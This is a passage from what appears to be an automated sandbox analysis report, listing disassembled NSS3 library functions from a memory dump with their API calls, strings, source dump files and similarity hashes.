                                                                                • Instruction Fuzzy Hash: 81213B71900104EFEB20DB65FE86B6F3BF5EB4A30DF054029F91A97252DBB09908C792
                                                                                Function 6D084D80 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 36COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • sqlite3_log.NSS3(00000015,API call with %s database connection pointer,invalid), ref: 6D084DC3
                                                                                • sqlite3_log.NSS3(00000015,%s at line %d of [%.10s],misuse,00029CA4,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6D084DE0
                                                                                Strings
                                                                                • 9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6D084DCB
                                                                                • API call with %s database connection pointer, xrefs: 6D084DBD
                                                                                • %s at line %d of [%.10s], xrefs: 6D084DDA
                                                                                • invalid, xrefs: 6D084DB8
                                                                                • misuse, xrefs: 6D084DD5
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.2844790460.000000006CF31000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CF30000, based on PE: true
                                                                                • Associated: 00000009.00000002.2844759312.000000006CF30000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846176571.000000006D0CF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846397061.000000006D10E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846454103.000000006D10F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846516166.000000006D110000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846542493.000000006D115000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_6cf30000_kat796E.jbxd
                                                                                Similarity
                                                                                • API ID: sqlite3_log
                                                                                • String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$API call with %s database connection pointer$invalid$misuse
                                                                                • API String ID: 632333372-2974027950
                                                                                • Opcode ID: 6b57473240fc03db5845f152d718f9c9e87932d95098cf54dac54f26f5e119a6
                                                                                • Instruction ID: f0fa90c105a77f6d9b90bd06e28c597bb620f5b829de961eafda6520fa07df47
                                                                                • Opcode Fuzzy Hash: 6b57473240fc03db5845f152d718f9c9e87932d95098cf54dac54f26f5e119a6
                                                                                • Instruction Fuzzy Hash: 39F0B415E147693FFB009125DD10FA63BDE9F09359F4601A1ED0CAB2D3D605D9508291
                                                                                Function 6D084DF0 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 35COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • sqlite3_log.NSS3(00000015,API call with %s database connection pointer,invalid), ref: 6D084E30
                                                                                • sqlite3_log.NSS3(00000015,%s at line %d of [%.10s],misuse,00029CAD,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6D084E4D
                                                                                Strings
                                                                                • 9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6D084E38
                                                                                • API call with %s database connection pointer, xrefs: 6D084E2A
                                                                                • %s at line %d of [%.10s], xrefs: 6D084E47
                                                                                • invalid, xrefs: 6D084E25
                                                                                • misuse, xrefs: 6D084E42
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.2844790460.000000006CF31000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CF30000, based on PE: true
                                                                                • Associated: 00000009.00000002.2844759312.000000006CF30000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846176571.000000006D0CF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846397061.000000006D10E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846454103.000000006D10F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846516166.000000006D110000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846542493.000000006D115000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_6cf30000_kat796E.jbxd
                                                                                Similarity
                                                                                • API ID: sqlite3_log
                                                                                • String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$API call with %s database connection pointer$invalid$misuse
                                                                                • API String ID: 632333372-2974027950
                                                                                • Opcode ID: 076405b79e0003cfe104ffd9ceb420e9bebe9d8f4146e581d4cfea1d8c241b78
                                                                                • Instruction ID: 45996b00816715eba571efe04011008d250c75f27b1d373755bab5185a09dcbe
                                                                                • Opcode Fuzzy Hash: 076405b79e0003cfe104ffd9ceb420e9bebe9d8f4146e581d4cfea1d8c241b78
                                                                                • Instruction Fuzzy Hash: ACF08C15E44A293FFF1051259C10FB637CF9B1A366F5900A2EA0CA76D3E629DA6142A2
                                                                                Function 6CFF0C90 Relevance: 12.2, APIs: 8, Instructions: 191memorythreadCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • PR_SetError.NSS3(00000000,00000000,6CFF1444,?,00000001,?,00000000,00000000,?,?,6CFF1444,?,?,00000000,?,?), ref: 6CFF0CB3
                                                                                  • Part of subcall function 6D05C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6D05C2BF
                                                                                • PR_SetError.NSS3(FFFFE089,00000000,?,?,?,?,6CFF1444,?,00000001,?,00000000,00000000,?,?,6CFF1444,?), ref: 6CFF0DC1
                                                                                • PORT_Strdup_Util.NSS3(?,?,?,?,?,?,6CFF1444,?,00000001,?,00000000,00000000,?,?,6CFF1444,?), ref: 6CFF0DEC
                                                                                  • Part of subcall function 6D010F10: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000000,?,?,6CFB2AF5,?,?,?,?,?,6CFB0A1B,00000000), ref: 6D010F1A
                                                                                  • Part of subcall function 6D010F10: malloc.MOZGLUE(00000001), ref: 6D010F30
                                                                                  • Part of subcall function 6D010F10: memcpy.VCRUNTIME140(00000000,?,00000001), ref: 6D010F42
                                                                                • SECITEM_AllocItem_Util.NSS3(00000000,00000000,?,?,?,?,?,?,6CFF1444,?,00000001,?,00000000,00000000,?), ref: 6CFF0DFF
                                                                                • memcpy.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,?,6CFF1444,?,00000001,?,00000000), ref: 6CFF0E16
                                                                                • free.MOZGLUE(?,?,?,?,?,?,?,?,?,6CFF1444,?,00000001,?,00000000,00000000,?), ref: 6CFF0E53
                                                                                • PR_GetCurrentThread.NSS3(?,?,?,?,6CFF1444,?,00000001,?,00000000,00000000,?,?,6CFF1444,?,?,00000000), ref: 6CFF0E65
                                                                                • PR_SetError.NSS3(FFFFE089,00000000,?,?,?,?,6CFF1444,?,00000001,?,00000000,00000000,?), ref: 6CFF0E79
                                                                                  • Part of subcall function 6D001560: TlsGetValue.KERNEL32(00000000,?,6CFD0844,?), ref: 6D00157A
                                                                                  • Part of subcall function 6D001560: EnterCriticalSection.KERNEL32(?,?,?,6CFD0844,?), ref: 6D00158F
                                                                                  • Part of subcall function 6D001560: PR_Unlock.NSS3(?,?,?,?,6CFD0844,?), ref: 6D0015B2
                                                                                  • Part of subcall function 6CFCB1A0: DeleteCriticalSection.KERNEL32(5B5F5EDC,6CFD1397,00000000,?,6CFCCF93,5B5F5EC0,00000000,?,6CFD1397,?), ref: 6CFCB1CB
                                                                                  • Part of subcall function 6CFCB1A0: free.MOZGLUE(5B5F5EC0,?,6CFCCF93,5B5F5EC0,00000000,?,6CFD1397,?), ref: 6CFCB1D2
                                                                                  • Part of subcall function 6CFC89E0: TlsGetValue.KERNEL32(00000000,-00000008,00000000,?,?,6CFC88AE,-00000008), ref: 6CFC8A04
                                                                                  • Part of subcall function 6CFC89E0: EnterCriticalSection.KERNEL32(?), ref: 6CFC8A15
                                                                                  • Part of subcall function 6CFC89E0: memset.VCRUNTIME140(6CFC88AE,00000000,00000132), ref: 6CFC8A27
                                                                                  • Part of subcall function 6CFC89E0: PR_Unlock.NSS3(?), ref: 6CFC8A35
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.2844790460.000000006CF31000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CF30000, based on PE: true
                                                                                • Associated: 00000009.00000002.2844759312.000000006CF30000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846176571.000000006D0CF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846397061.000000006D10E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846454103.000000006D10F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846516166.000000006D110000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846542493.000000006D115000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_6cf30000_kat796E.jbxd
                                                                                Similarity
                                                                                • API ID: CriticalErrorSectionValue$EnterUnlockUtilfreememcpy$AllocCurrentDeleteItem_Strdup_Threadmallocmemsetstrlen
                                                                                • String ID:
                                                                                • API String ID: 1601681851-0
                                                                                • Opcode ID: 4a818022cd7680b7187b0f2b804a2c2e24e127dca7bbc08964a02a375da812a4
                                                                                • Instruction ID: faf3b07c07ac327576f5c9d272f1b1a1e0af859cc598764d0f095f37f6cd1fbc
                                                                                • Opcode Fuzzy Hash: 4a818022cd7680b7187b0f2b804a2c2e24e127dca7bbc08964a02a375da812a4
                                                                                • Instruction Fuzzy Hash: 2951A3B6E002015FFB009F64EC81BAF37A8EF05218F1A4464ED199B712FB71ED1586A2
                                                                                Function 6CFC9C50 Relevance: 12.1, APIs: 8, Instructions: 137COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 6CFC8850: calloc.MOZGLUE(00000001,00000028,00000000,?,?,6CFD0715), ref: 6CFC8859
                                                                                  • Part of subcall function 6CFC8850: PR_NewLock.NSS3 ref: 6CFC8874
                                                                                  • Part of subcall function 6CFC8850: PL_InitArenaPool.NSS3(-00000008,NSS,00000800,00000008), ref: 6CFC888D
                                                                                • PR_NewLock.NSS3 ref: 6CFC9CAD
                                                                                  • Part of subcall function 6D0798D0: calloc.MOZGLUE(00000001,00000084,6CFA0936,00000001,?,6CFA102C), ref: 6D0798E5
                                                                                  • Part of subcall function 6CFA07A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,6CF3204A), ref: 6CFA07AD
                                                                                  • Part of subcall function 6CFA07A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6CF3204A), ref: 6CFA07CD
                                                                                  • Part of subcall function 6CFA07A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6CF3204A), ref: 6CFA07D6
                                                                                  • Part of subcall function 6CFA07A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,6CF3204A), ref: 6CFA07E4
                                                                                  • Part of subcall function 6CFA07A0: TlsSetValue.KERNEL32(00000000,?,6CF3204A), ref: 6CFA0864
                                                                                  • Part of subcall function 6CFA07A0: calloc.MOZGLUE(00000001,0000002C), ref: 6CFA0880
                                                                                  • Part of subcall function 6CFA07A0: TlsSetValue.KERNEL32(00000000,?,?,6CF3204A), ref: 6CFA08CB
                                                                                  • Part of subcall function 6CFA07A0: TlsGetValue.KERNEL32(?,?,6CF3204A), ref: 6CFA08D7
                                                                                  • Part of subcall function 6CFA07A0: TlsGetValue.KERNEL32(?,?,6CF3204A), ref: 6CFA08FB
                                                                                • TlsGetValue.KERNEL32 ref: 6CFC9CE8
                                                                                • EnterCriticalSection.KERNEL32(?,?,6CFCECEC,6CFD2FCD,00000000,?,6CFD2FCD,?), ref: 6CFC9D01
                                                                                • TlsGetValue.KERNEL32(?,?,?,6CFCECEC,6CFD2FCD,00000000,?,6CFD2FCD,?), ref: 6CFC9D38
                                                                                • EnterCriticalSection.KERNEL32(?,?,6CFCECEC,6CFD2FCD,00000000,?,6CFD2FCD,?), ref: 6CFC9D4D
                                                                                • PR_Unlock.NSS3 ref: 6CFC9D70
                                                                                • PR_Unlock.NSS3 ref: 6CFC9DC3
                                                                                • PR_NewLock.NSS3 ref: 6CFC9DDD
                                                                                  • Part of subcall function 6CFC88D0: TlsGetValue.KERNEL32(00000000,00000000,00000000,?,6CFD0725,00000000,00000058), ref: 6CFC8906
                                                                                  • Part of subcall function 6CFC88D0: EnterCriticalSection.KERNEL32(?), ref: 6CFC891A
                                                                                  • Part of subcall function 6CFC88D0: PL_ArenaAllocate.NSS3(?,?), ref: 6CFC894A
                                                                                  • Part of subcall function 6CFC88D0: calloc.MOZGLUE(00000001,6CFD072D,00000000,00000000,00000000,?,6CFD0725,00000000,00000058), ref: 6CFC8959
                                                                                  • Part of subcall function 6CFC88D0: memset.VCRUNTIME140(?,00000000,?), ref: 6CFC8993
                                                                                  • Part of subcall function 6CFC88D0: PR_Unlock.NSS3(?), ref: 6CFC89AF
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.2844790460.000000006CF31000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CF30000, based on PE: true
                                                                                • Associated: 00000009.00000002.2844759312.000000006CF30000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846176571.000000006D0CF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846397061.000000006D10E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846454103.000000006D10F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846516166.000000006D110000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846542493.000000006D115000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_6cf30000_kat796E.jbxd
                                                                                Similarity
                                                                                • API ID: Value$calloc$CriticalEnterLockSectionUnlock$Arena$AllocateInitPoolmemset
                                                                                • String ID:
                                                                                • API String ID: 3394263606-0
                                                                                • Opcode ID: 9fdedb238ceefb7c663eb0304045dafd090ef51eac33b071f6be8e74089ed225
                                                                                • Instruction ID: cd0d5c46f909e1e259dc582fd6d62f2cfd71d6abf0740afa5e42414a78ce7390
                                                                                • Opcode Fuzzy Hash: 9fdedb238ceefb7c663eb0304045dafd090ef51eac33b071f6be8e74089ed225
                                                                                • Instruction Fuzzy Hash: 12513F71B056068FDB00EF68C18476BBBF0BF44349F158529D8989B750DF70E984CB92
                                                                                Function 6CFBDCE0 Relevance: 12.1, APIs: 8, Instructions: 90stringCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • PR_Now.NSS3 ref: 6CFBDCFA
                                                                                  • Part of subcall function 6D079DB0: GetSystemTime.KERNEL32(?,?,?,?,00000001,00000000,?,6D0C0A27), ref: 6D079DC6
                                                                                  • Part of subcall function 6D079DB0: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,00000001,00000000,?,6D0C0A27), ref: 6D079DD1
                                                                                  • Part of subcall function 6D079DB0: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6D079DED
                                                                                • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?), ref: 6CFBDD40
                                                                                • CERT_FindCertIssuer.NSS3(?,?,?,?), ref: 6CFBDD62
                                                                                • CERT_DestroyCertificate.NSS3(?), ref: 6CFBDD71
                                                                                • CERT_DestroyCertificate.NSS3(00000000), ref: 6CFBDD81
                                                                                • CERT_RemoveCertListNode.NSS3(?), ref: 6CFBDD8F
                                                                                  • Part of subcall function 6CFD06A0: TlsGetValue.KERNEL32 ref: 6CFD06C2
                                                                                  • Part of subcall function 6CFD06A0: EnterCriticalSection.KERNEL32(?), ref: 6CFD06D6
                                                                                  • Part of subcall function 6CFD06A0: PR_Unlock.NSS3 ref: 6CFD06EB
                                                                                • CERT_DestroyCertificate.NSS3(?), ref: 6CFBDD9E
                                                                                • CERT_DestroyCertificate.NSS3(?), ref: 6CFBDDB7
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.2844790460.000000006CF31000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CF30000, based on PE: true
                                                                                • Associated: 00000009.00000002.2844759312.000000006CF30000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846176571.000000006D0CF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846397061.000000006D10E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846454103.000000006D10F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846516166.000000006D110000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846542493.000000006D115000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_6cf30000_kat796E.jbxd
                                                                                Similarity
                                                                                • API ID: CertificateDestroy$Time$CertSystem$CriticalEnterFileFindIssuerListNodeRemoveSectionUnlockUnothrow_t@std@@@Value__ehfuncinfo$??2@strcmp
                                                                                • String ID:
                                                                                • API String ID: 653623313-0
                                                                                • Opcode ID: 5cd1e4dda6c1f4cf8b67a259948b155a30ce1e8299e7f18c14593722b5766ec0
                                                                                • Instruction ID: 8f44b9071a5366c46d89482a4e224300fc0cb2e71bb2efa1f849c739a4cdfd71
                                                                                • Opcode Fuzzy Hash: 5cd1e4dda6c1f4cf8b67a259948b155a30ce1e8299e7f18c14593722b5766ec0
                                                                                • Instruction Fuzzy Hash: 6C218FB6E011159BDF019E96DC80A9FB7B4AF09318F190024ED58B7709E731E915CBE2
                                                                                Function 6CFB3C90 Relevance: 12.1, APIs: 8, Instructions: 60COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • TlsGetValue.KERNEL32(?,?,?,?,6D02460B,?,?), ref: 6CFB3CA9
                                                                                • EnterCriticalSection.KERNEL32(?), ref: 6CFB3CB9
                                                                                • PL_HashTableLookup.NSS3(?), ref: 6CFB3CC9
                                                                                • SECITEM_DupItem_Util.NSS3(00000000), ref: 6CFB3CD6
                                                                                • PR_Unlock.NSS3 ref: 6CFB3CE6
                                                                                • CERT_FindCertByDERCert.NSS3(?,00000000), ref: 6CFB3CF6
                                                                                • SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6CFB3D03
                                                                                • PR_Unlock.NSS3 ref: 6CFB3D15
                                                                                  • Part of subcall function 6D05DD70: TlsGetValue.KERNEL32 ref: 6D05DD8C
                                                                                  • Part of subcall function 6D05DD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6D05DDB4
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.2844790460.000000006CF31000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CF30000, based on PE: true
                                                                                • Associated: 00000009.00000002.2844759312.000000006CF30000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846176571.000000006D0CF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846397061.000000006D10E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846454103.000000006D10F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846516166.000000006D110000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846542493.000000006D115000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_6cf30000_kat796E.jbxd
                                                                                Similarity
                                                                                • API ID: CertCriticalItem_SectionUnlockUtilValue$EnterFindHashLeaveLookupTableZfree
                                                                                • String ID:
                                                                                • API String ID: 1376842649-0
                                                                                • Opcode ID: 9b156232eac83659cd83d9bebcfccdfe3bc90ab64487d3fe7448e48c17c12a32
                                                                                • Instruction ID: efee5027aef088f725fde589fdb40d85f393a424d123d51493a7b6df3354ef3e
                                                                                • Opcode Fuzzy Hash: 9b156232eac83659cd83d9bebcfccdfe3bc90ab64487d3fe7448e48c17c12a32
                                                                                • Instruction Fuzzy Hash: E7112CB6C40519ABEB011765FC02BAA7A7DEB4725CB150130ED1853211FF72D96CC6E1
                                                                                Function 6D038D20 Relevance: 10.8, APIs: 7, Instructions: 290memorythreadCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.2844790460.000000006CF31000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CF30000, based on PE: true
                                                                                • Associated: 00000009.00000002.2844759312.000000006CF30000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846176571.000000006D0CF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846397061.000000006D10E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846454103.000000006D10F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846516166.000000006D110000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846542493.000000006D115000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_6cf30000_kat796E.jbxd
                                                                                Similarity
                                                                                • API ID: Errorfree$Alloc_CurrentThreadUtilmemcpy
                                                                                • String ID:
                                                                                • API String ID: 4163001165-0
                                                                                • Opcode ID: 173000621a3ebe1c2c6f3aa4288704b0c87be0593980fa70013bceaf3efb3bb9
                                                                                • Instruction ID: 28ac10f65251e5b3edf92f73ea2d5e4caae42b17e95d89e1ef88647bbb0d7554
                                                                                • Opcode Fuzzy Hash: 173000621a3ebe1c2c6f3aa4288704b0c87be0593980fa70013bceaf3efb3bb9
                                                                                • Instruction Fuzzy Hash: 02A1B275A087139FF714DF24D880B6AB7E9EF98304F064968E949DB252E730EA44C792
                                                                                Function 6D028C10 Relevance: 10.8, APIs: 7, Instructions: 279COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • PR_SetError.NSS3(FFFFE001,00000000), ref: 6D028C93
                                                                                  • Part of subcall function 6D05C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6D05C2BF
                                                                                  • Part of subcall function 6D008A60: TlsGetValue.KERNEL32(6CFB61C4,?,6CFB5F9C,00000000), ref: 6D008A81
                                                                                  • Part of subcall function 6D008A60: TlsGetValue.KERNEL32(?,?,?,6CFB5F9C,00000000), ref: 6D008A9E
                                                                                  • Part of subcall function 6D008A60: EnterCriticalSection.KERNEL32(?,?,?,?,6CFB5F9C,00000000), ref: 6D008AB7
                                                                                  • Part of subcall function 6D008A60: PR_Unlock.NSS3(?,?,?,?,?,6CFB5F9C,00000000), ref: 6D008AD2
                                                                                • memset.VCRUNTIME140(?,00000000,?), ref: 6D028CFB
                                                                                • memset.VCRUNTIME140(?,00000000,?), ref: 6D028D10
                                                                                  • Part of subcall function 6D008970: TlsGetValue.KERNEL32(?,00000000,6CFB61C4,?,6CFB5639,00000000), ref: 6D008991
                                                                                  • Part of subcall function 6D008970: TlsGetValue.KERNEL32(?,?,?,?,?,6CFB5639,00000000), ref: 6D0089AD
                                                                                  • Part of subcall function 6D008970: EnterCriticalSection.KERNEL32(?,?,?,?,?,?,6CFB5639,00000000), ref: 6D0089C6
                                                                                  • Part of subcall function 6D008970: PR_WaitCondVar.NSS3 ref: 6D0089F7
                                                                                  • Part of subcall function 6D008970: PR_Unlock.NSS3(?,?,?,?,?,?,?,6CFB5639,00000000), ref: 6D008A0C
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.2844790460.000000006CF31000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CF30000, based on PE: true
                                                                                • Associated: 00000009.00000002.2844759312.000000006CF30000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846176571.000000006D0CF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846397061.000000006D10E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846454103.000000006D10F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846516166.000000006D110000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846542493.000000006D115000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_6cf30000_kat796E.jbxd
                                                                                Similarity
                                                                                • API ID: Value$CriticalEnterSectionUnlockmemset$CondErrorWait
                                                                                • String ID:
                                                                                • API String ID: 2412912262-0
                                                                                • Opcode ID: 76bd7f529b31a05a3ece98444a855ff15ddc0aeb025a21affa7e661134d6ba18
                                                                                • Instruction ID: 43d81e0d30f3b40ebbb943fdfbe0844738efe2320862edc1810e5269d73d5478
                                                                                • Opcode Fuzzy Hash: 76bd7f529b31a05a3ece98444a855ff15ddc0aeb025a21affa7e661134d6ba18
                                                                                • Instruction Fuzzy Hash: CDB18CB4D042099BEB15CF65DC80BAEBBFAFF48308F10412DE91AA7351E731A956CB51
                                                                                Function 6CFB9C50 Relevance: 10.8, APIs: 7, Instructions: 253stringCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 6CFD11C0: PR_NewLock.NSS3 ref: 6CFD1216
                                                                                • free.MOZGLUE(?), ref: 6CFB9E17
                                                                                • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6CFB9E25
                                                                                • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6CFB9E4E
                                                                                • TlsGetValue.KERNEL32 ref: 6CFB9EA2
                                                                                  • Part of subcall function 6CFC9500: memcpy.VCRUNTIME140(00000000,?,00000000,?,?), ref: 6CFC9546
                                                                                • EnterCriticalSection.KERNEL32(?), ref: 6CFB9EB6
                                                                                • PR_Unlock.NSS3 ref: 6CFB9ED9
                                                                                • PR_SetError.NSS3(FFFFE08A,00000000), ref: 6CFB9F18
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.2844790460.000000006CF31000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CF30000, based on PE: true
                                                                                • Associated: 00000009.00000002.2844759312.000000006CF30000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846176571.000000006D0CF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846397061.000000006D10E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846454103.000000006D10F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846516166.000000006D110000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846542493.000000006D115000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_6cf30000_kat796E.jbxd
                                                                                Similarity
                                                                                • API ID: strlen$CriticalEnterErrorLockSectionUnlockValuefreememcpy
                                                                                • String ID:
                                                                                • API String ID: 3381623595-0
                                                                                • Opcode ID: 569a460baa90d0786383ee6d6cedca2a48d03d51dc7fd99fcc98d3d88b0614cf
                                                                                • Instruction ID: 8151461992fb45eca467a5266c3e9315737d6f6c1e94387e43887f4a0670c8df
                                                                                • Opcode Fuzzy Hash: 569a460baa90d0786383ee6d6cedca2a48d03d51dc7fd99fcc98d3d88b0614cf
                                                                                • Instruction Fuzzy Hash: F681F4B1A00602ABEB109F25DC41BABB7F9BF55248F144528EC5597B41FF31EA14C7A2
                                                                                Function 6CFCDCB0 Relevance: 10.7, APIs: 7, Instructions: 245stringCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 6CFCAB10: DeleteCriticalSection.KERNEL32(D958E852,6CFD1397,5B5F5EC0,?,?,6CFCB1EE,2404110F,?,?), ref: 6CFCAB3C
                                                                                  • Part of subcall function 6CFCAB10: free.MOZGLUE(D958E836,?,6CFCB1EE,2404110F,?,?), ref: 6CFCAB49
                                                                                  • Part of subcall function 6CFCAB10: DeleteCriticalSection.KERNEL32(5D5E6D1C), ref: 6CFCAB5C
                                                                                  • Part of subcall function 6CFCAB10: free.MOZGLUE(5D5E6D10), ref: 6CFCAB63
                                                                                  • Part of subcall function 6CFCAB10: DeleteCriticalSection.KERNEL32(0148B821,?,2404110F,?,?), ref: 6CFCAB6F
                                                                                  • Part of subcall function 6CFCAB10: free.MOZGLUE(0148B805,?,2404110F,?,?), ref: 6CFCAB76
                                                                                • TlsGetValue.KERNEL32 ref: 6CFCDCFA
